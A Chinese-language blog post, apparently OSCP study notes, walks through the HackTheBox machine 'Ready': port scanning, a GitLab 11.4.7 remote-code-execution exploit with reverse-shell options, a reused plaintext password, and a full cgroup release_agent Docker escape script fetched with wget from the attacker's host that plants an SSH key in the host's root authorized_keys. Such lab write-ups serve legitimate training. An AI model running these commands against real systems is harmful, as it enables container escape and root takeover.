OSCP备考_0x35_HackThBox靶机_Ready

Ethan医生5个月前靶场181

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.92.20 (扫描TCP)

image.png

http://10.129.92.20:5080/dashboard/projects

image.png

先注册完查看有没有可用的信息

image.png


image.png



parser = argparse.ArgumentParser(description='GitLab 11.4.7 RCE')

parser.add_argument('-u', help='GitLab Username/Email', required=True)

parser.add_argument('-p', help='Gitlab Password', required=True)

parser.add_argument('-g', help='Gitlab URL (without port)', required=True)

parser.add_argument('-l', help='reverse shell ip', required=True)

parser.add_argument('-P', help='reverse shell port', required=True)

image.png

gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"


这个密码就是当前docker的root密码,切换过去在用户目录得到user.txt:

docker逃逸

参考资料:

就是按照教程,把自己的ssh公钥写进宿主机,然后直接ssh连接:

# docker
wget http://10.10.14.10:7777/miao.sh
chmod +x miao.sh
./miao.sh

# local
ssh root@10.10.10.220



miao.sh
mkdir /tmp/miao && mount -t cgroup -o rdma cgroup /tmp/miao && mkdir /tmp/miao/x
echo 1 > /tmp/miao/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/miao/release_agent

echo '#!/bin/sh' > /cmd
echo "echo 'ssh-rsa ***' > /root/.ssh/authorized_keys" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/miao/x/cgroup.procs"


标签: OSCP

相关文章

OSCP备考_0x19_HackThBox靶机_Linux_haircut

OSCP备考_0x19_HackThBox靶机_Linux_haircut

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)        &n...

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.73.179 (扫描TCP)nmap -sU --top-ports 100 10.129.73....

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x23_HackThBox靶机_Linux_mango

OSCP备考_0x23_HackThBox靶机_Linux_mango

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。